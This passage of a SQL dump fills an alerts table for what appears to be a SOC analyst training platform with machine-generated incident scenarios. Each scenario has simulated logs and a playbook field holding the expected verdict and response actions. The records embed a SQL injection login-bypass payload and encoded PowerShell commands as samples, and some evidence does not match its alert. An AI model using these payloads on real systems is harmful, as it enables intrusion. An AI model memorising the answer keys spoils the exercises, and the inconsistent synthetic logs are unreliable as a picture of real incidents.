3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1248, 'Malicious Command Execution Detected', 'high', 'Velociraptor', 'A suspicious PowerShell script was executed on an internal server, indicating potential malware deployment. The script was executed from an unknown external IP address.', 'Malware', 'T1059', 1, 'investigating', 277, '{\"timestamp\":\"2026-02-14T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"hostname\":\"Server01\",\"command_line\":\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\"}', '2026-02-14 17:16:52', '2026-03-11 11:48:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Privileged user account accessed\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The external IP address and the encoded PowerShell command are indicative of a malware attack. 
Immediate isolation and forensic analysis are required.\"}', 'Intermediate', 'IR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1249, 'SQL Injection Attack Detected on Public Web Application', 'critical', 'KAPE', 'A SQL injection attack was detected targeting a public-facing web application. The payload was crafted to extract sensitive database information.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T10:15:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.22\",\"dst_ip\":\"203.0.113.10\",\"username\":\"web_user\",\"hostname\":\"WebServer01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-02-14 17:16:52', '2026-02-16 17:42:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Public-facing web server IP address\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL injection payload is a classic attack vector aiming to bypass authentication or extract database information. 
Blocking the attacker IP and securing the web application is critical.\"}', 'Intermediate', 'IR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 
- 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1250, 'AWS GuardDuty: Suspicious Failed Login Attempts Detected', 'high', 'AWS GuardDuty', 'Multiple failed login attempts detected from an external IP known for brute force attacks targeting IAM user accounts.', 'Brute Force', 'T1110', 0, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.100\",\"username\":\"jdoe\",\"hostname\":\"aws-ec2-instance\",\"failed_attempts\":25}', '2026-02-14 17:37:37', '2026-02-16 17:11:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IAM user account targeted in brute force attack\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted AWS instance\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a known malicious IP indicate a brute force attack on AWS IAM user accounts.\"}', 'Novice', 'CLOUD', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-15T12:46:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-15T12:45:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-15T12:44:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-15T12:43:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1251, 'Prisma Cloud: Malware Detected in Kubernetes Pod', 'critical', 'Prisma Cloud', 'Malware signature detected in a Kubernetes pod on the cluster, indicating an attempted compromise by a known threat.', 'Malware', 'T1059', 0, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T12:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"hostname\":\"k8s-node-1\",\"command_line\":\"/tmp/malicious_executable\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-02-14 17:37:37', '2026-02-15 12:47:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60+ antivirus engines as malicious\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in distribution of malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"/tmp/malicious_executable\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with known malware campaigns\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of a known malware hash in the Kubernetes environment suggests a successful infiltration attempt requiring immediate containment and analysis.\"}', 'Novice', 'CLOUD', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1252, 'Detected Brute Force Attack on External SSH Service', 'high', 'Splunk', 'Multiple failed login attempts detected from a foreign IP targeting SSH service on an internal server.', 'Brute Force', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T02:34:56Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"internal-ssh-server\",\"failed_attempts\":35}', '2026-02-14 12:15:28', '2026-02-19 15:19:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed attempts from a suspicious foreign IP indicates a brute force attack.\"}', 'Intermediate', 'IR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-15T12:46:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 
192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-15T12:45:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-15T12:44:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-15T12:43:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main 
source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1253, 'Suspicious PowerShell Script Execution Detected', 'medium', 'Velociraptor', 'A PowerShell script with a potentially malicious command was executed on an internal host.', 'Malware', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-02-14T05:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.12\",\"hostname\":\"workstation01\",\"command_line\":\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\"}', '2026-02-14 17:33:14', '2026-03-11 12:24:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"collect_forensics\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command looks suspicious and warrants further investigation.\"}', 'Intermediate', 'IR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 